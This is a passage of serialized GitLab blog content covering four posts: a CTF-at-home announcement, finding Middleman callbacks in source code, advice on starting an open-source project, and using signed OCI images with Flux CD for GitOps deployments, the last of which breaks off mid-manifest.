(CTF)](https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security) contest for GitLab team members in mid-March to provide a fun, hands-on AppSec experience for those who were interested in a little friendly competition.\n\nWe've reworked this contest a bit so now you can solve the challenges at home!\nAnd, even better, because we created this CTF with all of our GitLab team members in mind, there's a wide variety of beginner-friendly challenges, most of which are related to web security.\n\n## Run it at home\nAll you need to run this at home is [Docker](https://docs.docker.com/get-docker/) and [Docker Compose](https://docs.docker.com/compose/install/). The [CTF-at-home repository](https://gitlab.com/gitlab-com/gl-security/ctf-at-home) is where we're releasing the challenges within a `docker-compose` file. Be sure to have a look at the [README](https://gitlab.com/gitlab-com/gl-security/ctf-at-home/-/blob/master/README.md) for set-up instructions.\n\nRunning the challenges should be as simple as:\n\n```\ngit clone https://gitlab.com/gitlab-com/gl-security/ctf-at-home.git\ncd ctf-at-home\ndocker-compose up\n```\n\nAnd then, visit `http://capture.local.thetanuki.io` to get to the landing page. Fingers crossed🤞, it worked on my machine 😉.\n\n## Try your hand at solving some challenges, then tell us about it\n\nTo keep it beginner friendly, the run-at-home CTF also includes spoilers and solutions for all challenges. If you have trouble running the CTF feel free to [create an issue here](https://gitlab.com/gitlab-com/gl-security/ctf-at-home/-/issues/new).\n\nIf you run the CTF at home and solve some challenges, we're happy to hear your feedback, or even see some write-ups. Feel free to share your experience in the comments below or tweet [@gitlab](https://twitter.com/gitlab).\n\n## Our results 🥁\n\nWe initially planned this CTF contest for [GitLab Contribute](/events/gitlab-contribute/), our company-wide get together, which was to be held in Prague at end of March. While COVID-19 made the physical get-together impossible, this CTF was perfect for running worldwide online and across GitLab teams. We ran the challenges from March 16 to March 27, 2020 and had a total of 50 GitLab team members participate in CTF.\n\n### Team member testimonials\n\nFrom a CTF coordinator perspective, running the contest was a great experience. Thankfully, the players were having a good time as well and we received lots of positive feedback, including:\n\n> It was great to collaborate with folks from all different functional groups at GitLab and all around the world. We learned a lot from each other and everyone was able to contribute!\n\n-- [@stkerr](/company/team/#stkerr)\n\n> The perfect mixture of challenges, ranging from very awesome and interesting, to very awesome and challenging. 😆\n\n-- [@cat](/company/team/#cat)\n\n### Hall of Fame\n\nMeet our top twenty players\n\n1. [@cat](/company/team/#cat)\n2. [@ayufan](/company/team/#ayufan)\n3. [@engwan](/company/team/#engwan)\n4. [@vitallium](/company/team/#vitallium)\n5. [@stkerr](/company/team/#stkerr)\n6. [@T4cC0re](/company/team/#T4cC0re)\n7. [@xanf](/company/team/#xanf)\n8. [@ahmadsherif](/company/team/#ahmadsherif)\n9. [@mbobin](/company/team/#mbobin)\n10. [@jrreid](/company/team/#jrreid)\n11. [@djadmin](/company/team/#djadmin)\n12. [@vij](/company/team/#vij)\n13. [@robotmay](/company/team/#robotmay_gitlab)\n14. [@kgoossens](/company/team/#kgoossens)\n15. [@simon_mansfield](/company/team/#simon_mansfield)\n16. [@alan](/company/team/#alan)\n17. [@SteveTerhar](/company/team/#SteveTerhar)\n18. [@rchan-gitlab](/company/team/#rchan-gitlab)\n19. [@razer6](/company/team/#razer6)\n20. [@floudet](/company/team/#floudet)\n\n__Special shout-outs to [@cat](/company/team/#cat) and [@ayufan](/company/team/#ayufan) who both solved ALL the challenges in less than three days.__\n\nBecause building the challenges and playing the CTF were such a positive experience for all involved, we wanted to make those CTF challenges public. We're hoping to have another CTF in the future, but in the meantime, let us know what you think of this one via comment below or [@gitlab](https://twitter.com/gitlab) on Twitter.\n\nHappy hacking!\n",[865,3091,9],{"slug":3152,"featured":6,"template":689},"how-to-play-gitlab-ctf-at-home","content:en-us:blog:how-to-play-gitlab-ctf-at-home.yml","How To Play Gitlab Ctf At Home","en-us/blog/how-to-play-gitlab-ctf-at-home.yml","en-us/blog/how-to-play-gitlab-ctf-at-home",{"_path":3158,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3159,"content":3164,"config":3170,"_id":3172,"_type":14,"title":3173,"_source":16,"_file":3174,"_stem":3175,"_extension":19},"/en-us/blog/how-to-read-open-source-finding-middleman-callbacks",{"title":3160,"description":3161,"ogTitle":3160,"ogDescription":3161,"noIndex":6,"ogImage":1007,"ogUrl":3162,"ogSiteName":673,"ogType":674,"canonicalUrls":3162,"schema":3163},"How to Read Open Source: Finding Middleman Callbacks","Open source empowers you to learn beyond existing documentation. Getting started can be confusing. This is a demonstration finding unlisted Middleman callbacks.","https://about.gitlab.com/blog/how-to-read-open-source-finding-middleman-callbacks","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to Read Open Source: Finding Middleman Callbacks\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Tyler Williams\"}],\n        \"datePublished\": \"2021-01-20\",\n      }",{"title":3160,"description":3161,"authors":3165,"heroImage":1007,"date":3167,"body":3168,"category":951,"tags":3169},[3166],"Tyler Williams","2021-01-20","        \n\n{::options parse_block_html=\"true\" /}\n\n\n\n## Why read open source? \n\nWhen folks write about open source, I think there is a strong emphasis on contributing to open source projects, which makes sense. Many software professionals are excited to give back to the community. \n\nBut beyond adding to your favorite project, open source philosophies have a number of other benefits in our daily lives. In particular, I love open source because it allows me to learn more about my tools when the documentation is out of date, incomplete, or leaves me with additional questions from my own curiosity. \n\nThis happened to me recently when I was working on [https://about.gitlab.com](https://about.gitlab.com), a static site built with [Middleman](https://middlemanapp.com/). I needed to find a more comprehensive list of available [callbacks](https://middlemanapp.com/advanced/custom-extensions/#callbacks) in the Middleman lifecycle.\n\nI hope this blog post is helpful if you're looking for existing Middleman callbacks, or if you're getting started reading through the source code of your favorite open source tools. \n\n## The task at hand\n\nIf you're getting started reading open source, I find it helps to have a specific task. Any unfamiliar codebase can be challenging to navigate. Having a goal in mind narrows your focus. Here was my task for Middleman:\n\nI recently created a merge request to [add Webpack devServer to the local development environment](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/71845). I had to modify some existing behavior of our Middleman preview server and wanted to use one of the lifecycle callbacks to modify the preview server's log output. \n\nHowever, the Middleman documentation does not currently list all available callbacks, nor where they happen in the lifecycle. The [extension docs](https://middlemanapp.com/advanced/custom-extensions/) say: \n\n> Middleman extensions are Ruby classes which can hook into various points of the Middleman system, add new features and manipulate content. This guide explains some of what's available, but you should read the Middleman source and the source of plugins like middleman-blog to discover all the hooks and extension points.\n\nI took them up on their advice and read through the [Middleman source code](https://github.com/middleman/middleman) to find the available callbacks. Here's what I found, and how I found them.\n\n## Callbacks available in Middleman Core\n\n1. `initialized`: called before config is parsed, and before extensions are registered\n1. `configure`: called to run any `configure` blocks (once for current environment, again for the current mode)\n1. `before_extensions`: called before the `ExtensionManager` is instantiated\n1. `before_instance_block`: called before any blocks are passed to the configuration context\n1. `before_sitemap`: called before the `SiteMap::Store` is instantiated, which initializes the sitemap\n1. `before_configuration`: called before configuration is parsed, mostly used for extensions\n1. `after_configuration`: called after extensions have worked\n1. `after_configuration_eval`: called after the configuration is parsed, before the pre-extension callback\n1. `ready`: called when everything is stable\n1. `before_build`: called before the site build process runs\n1. `after_build`: called after the builder is complete\n1. `before_shutdown`: called in the `shutdown!` method, which lets users know the application is shutting down\n1. `before`: called before Rack requests\n1. `before_server`: called before the `PreviewServer` is created\n1. `reload`: called before the new application is initialized on a reload event\n\n## How to find Middleman Callbacks\n\n1. [Clone](https://docs.gitlab.com/ee/gitlab-basics/start-using-git.html) the [Middleman repository](https://github.com/middleman/middleman) to your local machine. \n1. Open the Middleman directory in a text editor, IDE, or any tool that allows you to easily search through a folder's files for specific strings. \n1. Start with the [existing documentation](https://middlemanapp.com/advanced/custom-extensions/#callbacks) if it exists. Middleman lists the names of a few callbacks. You can search the directory for the string `after_configuration`.\n1. In this instance, you should be able to find that string used like so: `execute_callbacks(:after_configuration)`.\n1. You may also find it listed with other similar symbols in `middleman-core/lib/middleman-core/application.rb`. \n1. Read through the related blocks of code around these search results, you'll get some additional context for how they work, and you may find additional search terms that will be helpful.\n1. In the case of Middleman callbacks, you can continue to search for combinations of the `execute_callbacks` method with any callback listed in `middleman-core/lib/middleman-core/application.rb` to find where and when specific callbacks are used.\n\n## Contribute!\n\nWith this in-depth knowledge of your tool, you can be more productive at your day-to-day work, and you can contribute back to open source more easily. \n\nIn my case, I was able to identify the best callback for my usecase, and I now plan to check in with the Middleman team and ask if they would accept a contribution to their documentation with this information so it's easier for other folks to find in the future.\n",[9,752,686],{"slug":3171,"featured":6,"template":689},"how-to-read-open-source-finding-middleman-callbacks","content:en-us:blog:how-to-read-open-source-finding-middleman-callbacks.yml","How To Read Open Source Finding Middleman Callbacks","en-us/blog/how-to-read-open-source-finding-middleman-callbacks.yml","en-us/blog/how-to-read-open-source-finding-middleman-callbacks",{"_path":3177,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3178,"content":3183,"config":3189,"_id":3191,"_type":14,"title":3192,"_source":16,"_file":3193,"_stem":3194,"_extension":19},"/en-us/blog/how-to-start-a-great-oss-project",{"title":3179,"description":3180,"ogTitle":3179,"ogDescription":3180,"noIndex":6,"ogImage":1447,"ogUrl":3181,"ogSiteName":673,"ogType":674,"canonicalUrls":3181,"schema":3182},"How to start a great OSS project","In a modern DevOps world it's never been more critical to embrace open source. Here's everything you need to know to get started.","https://about.gitlab.com/blog/how-to-start-a-great-oss-project","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to start a great OSS project\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mike Vanbuskirk\"}],\n        \"datePublished\": \"2022-10-18\",\n      }",{"title":3179,"description":3180,"authors":3184,"heroImage":1447,"date":3186,"body":3187,"category":10,"tags":3188},[3185],"Mike Vanbuskirk","2022-10-18","\nIf you spend any time coding, you've probably considered starting an OSS project at some point. Of course, the natural temptation is to immediately sit down and start writing code. That's a great approach that many projects have started from, but what about when it's time to let others contribute?\n\nAn OSS project is as much about community as it is code, and the key to building a good project is providing an inviting, productive place for that community to work and create. How can new contributors be onboarded smoothly? What kind of maintenance and automation will allow the project to scale beyond the scope of its original creator's time and resources? This article hopes to answer a few of these questions and provide first-time project maintainers with a solid foundation for launching a great OSS project.\n\n## Create a great README.md\n\nA README file is the \"entry point\" to an OSS project. Most distributed version control software hosting platforms like GitLab make the README file the first thing a visitor sees when viewing the repo. A good README manages to convey important information about a project while focusing on ease of navigation and reading and grabs the attention of potential contributors and users.\n\nTo start, maintainers should familiarize themselves with [Markdown](https://www.markdownguide.org), the markup language used for most OSS project documentation files like README. Markdown is a simple, elegant tool for crafting content and it's helpful to be aware of its features and capabilities.\n\nFor the README file itself, there are some things maintainers can include that will help drive productive participation and engagement.\n\n### Overview of the project\n\nA great way to draw attention to your project is to lead with a UI or CLI screenshot of the software. Even better: record some basic usage and convert it to a GIF using an OSS (of course!) tool like [Terminalizer](https://github.com/faressoft/terminalizer). The overview should also include the \"why\" of the project; it should be clear what problem or problems the project solves, and what drove the maintainer to create the project.\n\n### How to install and use it\n\nOSS project users can often become OSS project contributors; a well-run and well-documented project goes a long way towards bringing more contributors into the fold. Users should be presented with clear, concise, and most importantly correct instructions for installing and using the software contained in the project. Potential users and contributors are likely to be put off by confusing, complex, or non-functional installation instructions.\n\n### Links to documentation\n\nNot all project documentation does or even should fit inside the README file. Your project likely depends on one or more programming languages, as well as the many development tools, libraries, and modules in the language ecosystem. The README should serve as a project portal; linking to third-party documentation as needed, rather than as a comprehensive collection of all relevant documentation in one place.\n\n### Links to Code of Conduct\n\nThe global OSS project community is made up of a great many individuals, representing a rich, diverse spectrum of backgrounds and identities. With that in mind, an OSS project needs to provide a welcoming, inclusive Code of Conduct with firm and clear rules around expected behavior and decorum. One option is [Contributor Covenant](https://www.contributor-covenant.org/). A shared understanding of what defines good conduct is a pillar of a good community.\n\n### Links and instructions for reporting bugs or requesting features\n\nIf OSS project users become contributors, a great way to foster this transition is to make it easy to report bugs or request features. Ideally, this is where your README file links to your CONTRIBUTING.md file as well.\n\nA great example of an OSS project with an awesome README is [Leapp](https://github.com/Noovolari/leapp#readme); here’s another [example on GitLab](https://gitlab.com/CalcProgrammer1/OpenRGB/-/blob/master/README.md). This [Hacker News discussion](https://news.ycombinator.com/item?id=30106264) further demonstrates the power of the OSS project community in helping drive better engagement.\n\n## Creating a great CONTRIBUTING.md is important too\n\nThe CONTRIBUTING.md file represents another very important piece of documentation in an OSS project. Ideally, a CONTRIBUTING file should contain clear instructions for how individuals can get started contributing to your project. It's also important to be cognizant of first-time contributors to your project versus first-time contributors to OSS. For first-time OSS participants, it can be helpful to include links [like this](https://opensource.guide/how-to-contribute/).\n\nThe focus should be on technical detail; clear, concise instructions for how to clone, build, test, and commit are just some of what should be included. An adequate amount of detail and context is important, especially around what pre-requisite knowledge is expected and where it can be gained. The goal is to provide a deterministic path for contributors, with the end-state being a well-formed Merge Request. The [GitLab document](https://about.gitlab.com/community/contribute/) provides an excellent example.\n\nThe documentation for contributing should include:\n\n### An introductory message\n\nThis should be a warm and welcoming message that encourages individuals to participate, but also gives them the right foundation and context for creating successful and helpful commits.\n\n### How to set up a development environment\n\nDevelopment environments can be tricky to get right. Contributors may be working from a variety of different operating systems, IDEs, and hardware. Focus on making your project as environment agnostic as possible. Containerization tools like [Docker](https://www.docker.com) can help by isolating dependencies within the boundaries of a container environment. Ideally, as the project grows, you can take advantage of CI/CD automation to standardize things like linting and testing in a controlled environment or provide a one-click deployment option via something like [GitPod](https://www.gitpod.io).\n\n### How to run tests\n\nEarly in the project lifecycle, testing will probably be a minimal, non-comprehensive affair. Contributors will need to have clear guidance on setting up local development and testing to ensure their commits don't break existing functionality. Tests are another aspect of contributions that benefit heavily from automation.\n\n### Links to resources, including a style guide, the primary discussion medium, etc...\n\nContributors will almost always need to refer to additional resources to help them complete their work. The Contributing doc is a great place to link helpful and relevant documentation, including style guides, as well as third-party information. You should also highlight where the primary discussion medium for the project is hosted, which can be something like Slack, Discord, or within the repository itself.\n\n### Specific instructions on reporting bugs, and submitting changes/features\n\nBe specific and explicit with instructions for bugs, changes, and features. Providing this up-front reduces the amount of time that might be spent requesting basic formatting changes or additional information that's typically always needed on these topics.\n\n### Less experienced contributors? Suggest first-time issues\n\nContributing to OSS can be very intimidating for first-time contributors. It can be extremely helpful not just for your project, but for the entire OSS ecosystem to label issues that are ideal for first-time contributions. GitLab uses the [quick win](https://gitlab.com/gitlab-org/gitlab/-/issues/?sort=created_date&state=opened&label_name%5B%5D=quick%20win&first_page_size=20) label to highlight such issues.\n\nSome criteria that make for good first issues:\n- User-facing documentation updates\n- Adding unit tests\n- Well-scoped bug fixes, with an obvious end-state or success metric\n- Writing good code comments. Python docstrings are great for defining class and method behavior and are read by a variety of tools.\n\n## Choose a good license\n\nAn often overlooked, but no less important, part of starting an OSS project is choosing a good license. The sometimes verbose legal language of OSS licenses, as well as the scare stories of them being applied inappropriately, can be intimidating to first-time contributors.\n\nFortunately, tools like [Choose a license](https://choosealicense.com/) are available, allowing maintainers to make an informed choice about which license model is the best fit for the project.\n\nThe MIT and Apache licenses are common choices for OSS projects, but each project and maintainer are unique. Something else to consider is that a lot of OSS contributors often work professionally as software engineers, and may be subject to rules that prohibit or limit OSS contributions based on intellectual property concerns.\n\n## Use templates to make OSS maintenance easier\n\nEarly in the life of your OSS project, there are likely to only be a few contributors. The inflow of pull requests, issues and feature work will generally be pretty manageable at this stage. The need for automation and well-defined processes won't be immediately obvious, but once the project scales it's very easy to feel overwhelmed without some structure in place.\n\nTemplates are a great way to help establish some formal processes for dealing with common workflows in OSS projects. For most version control platforms, templates are Markdown documents that allow maintainers to pre-define the format and structure of things like issues, pull requests, and merge requests. There are some good examples of [issue templates here](https://gitlab.com/gitlab-org/gitlab/-/tree/master/.gitlab/issue_templates), as well as [templates for merge requests](https://gitlab.com/gitlab-org/gitlab/-/tree/master/.gitlab/merge_request_templates).\n\nGiving contributors a clear picture of the required information up front saves a lot of time and headache, and avoids the dance of maintainers having to frequently ask follow-up questions on issues to get a clear picture of the actual technical problem at hand. Once your project hits a critical mass of participation, it's very important to have a good structure of templates in place to allow you, and eventually other maintainers to leverage their time.\n\nAnother easy win for ease of maintenance is committing a well-formed gitignore file that's relevant to the type of project and language choice. The [SCM Git docs](https://git-scm.com/docs/gitignore) provide great documentation.\n\n## Automate your OSS project\n\nLeveraging maintainer resources and time is the key to successfully growing an OSS project. Beyond templates, some platforms allow maintainers to automate significant portions of the building and deployment of their projects.\n\nOne piece of automation that should be familiar to anyone with experience in a DevOps environment is Continuous Integration/Continuous Delivery(CI/CD) pipelines. CI/CD tools enable engineers to define a repeatable workflow that can lint, analyze, test, and deploy code while providing fast feedback on the outcome of each step. For example: a project using Python could integrate [pyflakes](https://gitlab.com/dnsmichi/api-playground/-/blob/main/.gitlab-ci.yml) into its CI workflow, ensuring all contributions are tested with a common standard for linting and syntax. Even [Markdown code can be tested](https://gitlab.com/gitlab-de/playground/markdown-lint-challenge/-/blob/main/.gitlab-ci.yml) this way! If maintainers want to take this pattern even further, a tool like [MKDocs can be integrated into a CI/CD workflow](https://gitlab.com/dnsmichi/opsindev.news/-/blob/main/.gitlab-ci.yml) as well to automatically generate documentation for the project. For busy maintainers, automating the typically tedious process of writing and updating documentation is a huge win.\n\nWith automation deployed, status badges can be a great way to provide contributors with a holistic view of the state of things like test coverage, build status, CI/CD health, and the current release version. The status badges on [this project](https://gitlab.com/gitlab-de/use-cases/iac-tf-vuln-module) provide both users and contributors with an at-a-glance understanding of pipeline health, and the most current release version of the module.\n\nFor anyone thinking about starting a project or already maintaining an open source project, the [GitLab for Open Source](https://about.gitlab.com/solutions/open-source/) program provides maintainers access to Ultimate features for free, which includes many valuable Security features as well as additional CI minutes.\n\n## Great OSS projects aren't just code\n\nCode is of central importance to open source software. However, an OSS project is more than just code. It's a community of diverse individuals participating in a shared goal. To help achieve that goal, it's crucial to provide a well-maintained space for that community to participate.\n\nSaying thanks for every contribution, welcoming everyone, and encouraging them to stay with feedback can also help make the project an inviting space. Along the way, you'll find new maintainers, and friends as well.\n\n_GitLab developer evangelist Michael Friedrich made significant contributions to this post._\n",[685,9,708],{"slug":3190,"featured":6,"template":689},"how-to-start-a-great-oss-project","content:en-us:blog:how-to-start-a-great-oss-project.yml","How To Start A Great Oss Project","en-us/blog/how-to-start-a-great-oss-project.yml","en-us/blog/how-to-start-a-great-oss-project",{"_path":3196,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3197,"content":3203,"config":3209,"_id":3211,"_type":14,"title":3212,"_source":16,"_file":3213,"_stem":3214,"_extension":19},"/en-us/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery",{"title":3198,"description":3199,"ogTitle":3198,"ogDescription":3199,"noIndex":6,"ogImage":3200,"ogUrl":3201,"ogSiteName":673,"ogType":674,"canonicalUrls":3201,"schema":3202},"How to use OCI images as the source of truth for continuous delivery","Discover the benefits of using Open Container Initiative images as part of GitOps workflows and the many features GitLab offers to simplify deployments to Kubernetes.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097601/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20Use%20this%20page%20as%20a%20reference%20for%20thumbnail%20sizes_76Tn5jFmEHY5LFj8RdDjNY_1750097600692.png","https://about.gitlab.com/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to use OCI images as the source of truth for continuous delivery\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Daniel Helfand\"}],\n        \"datePublished\": \"2025-02-19\",\n      }",{"title":3198,"description":3199,"authors":3204,"heroImage":3200,"date":3206,"body":3207,"category":10,"tags":3208},[3205],"Daniel Helfand","2025-02-19","Is [GitOps](https://about.gitlab.com/topics/gitops/) still GitOps if you are not using a git repository as your deployment artifact? While git remains central to GitOps workflows, storing infrastructure definitions as Open Container Initiative (OCI) artifacts in container registries has seen a rise in adoption as the source for GitOps deployments. In this article, we will dive deeper into the ideas behind this trend and how GitLab features support this enhancement to GitOps workflows.\n\n## What is GitOps?\n\nThe [OpenGitOps](https://opengitops.dev/) project has defined [four principles](https://opengitops.dev/#principles) for the practice of GitOps:\n- A [system managed by GitOps](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#software-system) must have its [desired state expressed declaratively](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#declarative-description).\n- Desired state is stored in a way that enforces immutability and versioning, and retains a complete version history.\n- Software agents automatically pull the desired state declarations from the source.\n- Software agents [continuously](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#continuous) observe actual system state and [attempt to apply the desired state](https://github.com/open-gitops/documents/blob/v1.0.0/GLOSSARY.md#reconciliation).\n\nAn example of GitOps is storing the Kubernetes manifests for a microservice in a GitLab project. Those Kubernetes resources are then continuously reconciled by a [controller](https://kubernetes.io/docs/concepts/architecture/controller/) running on the Kubernetes cluster where the microservice is deployed to. This allows engineers to manage infrastructure using the same workflows as working with regular code, such as opening merge requests to make and review changes and versioning changes. GitOps also has operational benefits such as [preventing configuration drift](https://about.gitlab.com/topics/gitops/#cicd) and helps engineers audit what changes led to certain outcomes with deployments.\n\n## Benefits and limitations of git in GitOps workflows\n\nWhile git is an essential piece of GitOps workflows, git repositories were not designed to be deployed by GitOps controllers. Git does provide the ability for engineers to collaborate on infrastructure changes and audit these changes later on, but controllers do not need to download an entire git repository for a successful deployment. GitOps controllers simply need the infrastructure defined for a particular environment.\n\nAdditionally, an important piece of the deployment process is to [sign and verify deployments](https://docs.sigstore.dev/about/overview/#why-cryptographic-signing) to assure deployment changes to an environment are coming from a trusted source. While git commits can be signed and verified by GitOps controllers, commits may also capture other details not related to the deployment itself (e.g., documentation changes, updates to other environments, and git repository restructuring) or not enough of the deployment picture as a deployment may consist of multiple commits. This again feels like a case this git feature wasn’t designed for.\n\nAnother challenging aspect of git in GitOps workflows is that it can sometimes lead to more automation than expected. Soon after merging a change to the watched branch, it will be deployed. There are no controls in the process outside of git. How can you make sure that nothing gets deployed on a Friday late afternoon? What if teams responsible for deployment do not have permissions to merge changes in certain GitLab projects? Using OCI images adds a pipeline into the process, including all the delivery control features, like [approvals or deploy freezes](https://docs.gitlab.com/ee/ci/environments/protected_environments.html).\n\n## OCI images\n\nThe [Open Container Initiative](https://opencontainers.org/) has helped to define standards around container formats. While most engineers are familiar with building Dockerfiles into container images, many may not be as familiar with storing Kubernetes manifests in a container registry. Because [GitLab’s Container Registry](https://docs.gitlab.com/ee/user/packages/container_registry/) is OCI compliant, it allows for users to push Kubernetes manifests for a particular environment to a container registry. GitOps controllers, such as [Flux CD](https://about.gitlab.com/blog/why-did-we-choose-to-integrate-fluxcd-with-gitlab/), can use the manifests stored in this OCI artifact instead of needing to clone an entire git repository.\n\nOften in GitOps workflows, a git repository can include the infrastructure definitions for all environments that a microservice will be deployed to. By packaging the Kubernetes manifests for only a specific environment, Flux CD can download the minimum files needed to carry out a deployment to a specific environment.\n\n### Security benefits of using OCI artifacts\n\nAs mentioned previously, signing and verifying the artifacts to be deployed to an environment adds an additional layer of security for software projects. After Kubernetes manifests are pushed to a container registry, a tool like [Sigstore Cosign](https://docs.sigstore.dev/quickstart/quickstart-cosign/) can be used to sign the OCI image with a private key that can be securely stored in a GitLab project as a [CI/CD variable](https://docs.gitlab.com/ee/ci/variables/). Flux CD can then use a public key stored on a Kubernetes cluster to verify that a deployment is coming from a trusted source.\n\n## Using GitLab to push and sign OCI images\n\nGitLab offers many features that help simplify the process of packaging, signing, and deploying OCI images. A common way to structure GitLab projects with GitOps workflows is to have separate GitLab projects for microservices’ code and a single infrastructure repository for all microservices. If an application is composed of `n` microservices, this would require having `n +1` GitLab projects for an application.\n\nThe artifact produced by a code project is usually a container image that will be used to package the application. The infrastructure or delivery project will contain the Kubernetes manifests defining all the resources required to scale and serve traffic to each microservice. The artifact produced by this project is usually an OCI image used to deploy the application and other manifests to Kubernetes.\n\nIn this setup, separation of environments is handled by defining Kubernetes manifests in separate folders. These folders represent environments (e.g., development, staging, and production) that will host the application. When changes are made to the code project and a new container image is pushed, all that needs to be done to deploy these changes via GitLab’s integration with Flux CD is to edit the manifests under the environment folder to include the new image reference and open a merge request. Once that merge request is reviewed, approved, and merged, the delivery project’s CI/CD job will push a new OCI image that Flux CD will pick up and deploy to the new environment.\n\n![OCI images - flow chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097611/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097611046.png)\n\nSigning an OCI image is as simple as including Cosign in your project’s CI/CD job. You can simply generate a new public and private key with Cosign by running the commands below locally. Just make sure to log in to your GitLab instance with the [glab CLI](https://gitlab.com/gitlab-org/cli/#installation) and replace the [`PROJECT_ID`] for the Cosign command with your [delivery project’s ID](https://docs.gitlab.com/ee/user/project/working_with_projects.html#access-a-project-by-using-the-project-id).\n\n```\nglab auth login\ncosign generate-key-pair gitlab://[PROJECT_ID]\n```\n\nOnce the cosign command runs successfully, you can see the Cosign keys added to your project under the CI/CD variables section under the key names `COSIGN_PUBLIC_KEY` and `COSIGN_PRIVATE_KEY`.\n\n### Example CI/CD job\n\nA GitLab CI/CD job for pushing an OCI image will look something like the following:\n\n```yaml\nfrontend-deploy:\n  rules:\n  - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH\n    changes:\n      paths:\n      - manifests/dev/frontend-dev.yaml\n  trigger:\n    include:\n      - component: gitlab.com/components/fluxcd/oci-artifact@0.3.1\n        inputs:\n          version: 0.3.1\n          kubernetes_agent_reference: gitlab-da/projects/tanuki-bank/flux-config:dev\n          registry_image_url: \"oci://$CI_REGISTRY_IMAGE/frontend\"\n          image_tag: dev\n          manifest_path: ./manifests/dev/frontend-dev.yaml\n          flux_oci_repo_name: frontend\n          flux_oci_namespace_name: frontend-dev\n          signing_private_key: \"$COSIGN_PRIVATE_KEY\"\n```\n\nThe [GitLab CI/CD Catalog](https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/) offers a GitLab-maintained [CI/CD component for working with OCI artifacts and Flux CD](https://gitlab.com/explore/catalog/components/fluxcd). This component allows development teams to push Kubernetes manifests as OCI images to GitLab’s Container Registry or an external container registry, sign the OCI image using Cosign, and immediately reconcile the newly pushed image via Flux CD.\n\nIn the example above, the Flux CD `component` is included in a `.gitlab-ci.yml` file of a GitLab project. Using the component’s `inputs`, users can define what registry to push the image to (i.e., `registry_image_url` and `image tag`), the file path to Kubernetes manifests that will be pushed (i.e., `manifest_path`), the cosign private key used to sign images (i.e., `signing_private_key`), and the Kubernetes namespace and Flux CD [OCIRepository](https://fluxcd.io/flux/components/source/ocirepositories/) name needed to sync updates to an environment (i.e., `flux_oci_namespace_name` and `flux_oci_repo_name`).\n\nThe `kubernetes_agent_reference` allows GitLab CI/CD jobs to inherit the `kubeconfig` needed to access a Kubernetes cluster without needing to store a `kubeconfig` CI/CD variable in each GitLab project. By setting up the [GitLab agent for Kubernetes](https://docs.gitlab.com/ee/user/clusters/agent/), you can configure all GitLab projects’ CI/CD jobs in a [GitLab group](https://docs.gitlab.com/ee/user/group/) to inherit permissions to deploy to the Kubernetes cluster.\n\nThe agent for Kubernetes context is typically configured wherever you configure the GitLab Agent for Kubernetes in your GitLab group. It is typically recommended that this be done in the project where Flux CD is managed. More information on configuring the agent for CI/CD access can be found in our [CI/CD workflow documentation](https://docs.gitlab.com/ee/user/clusters/agent/ci_cd_workflow.html).\n\nThe variables `$COSIGN_PRIVATE_KEY`, `$FLUX_OCI_REPO_NAME`, and `$FRONTEND_DEV_NAMESPACE` are values stored as CI/CD variables to easily access and mask these sensitive pieces of data in CI/CD logs. The `$CI_REGISTRY_IMAGE` is a variable that GitLab jobs have available by default that specifies the GitLab project’s container registry.\n\n### Deploy OCI images\n\nUsing [Flux CD with your GitLab projects](https://docs.gitlab.com/ee/user/clusters/agent/gitops/flux_tutorial.html), you can automate deployments and signing verification for your microservice’s environments. Once Flux CD is configured to sync from a GitLab project, you could add the following Kubernetes [custom resource definitions](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/) to your project to sync your pushed OCI image.\n\n```yaml\napiVersion: v1\nkind: Namespace\nmetadata:\n  name: frontend-dev\n  labels:\n    name: frontend-dev\n---\napiVersion: bitnami.com/v1alpha1\nkind: SealedSecret\nmetadata:\n  name: cosign-public-key\n  namespace: frontend-dev\nspec:\n  encryptedData:\n    cosign.pub: 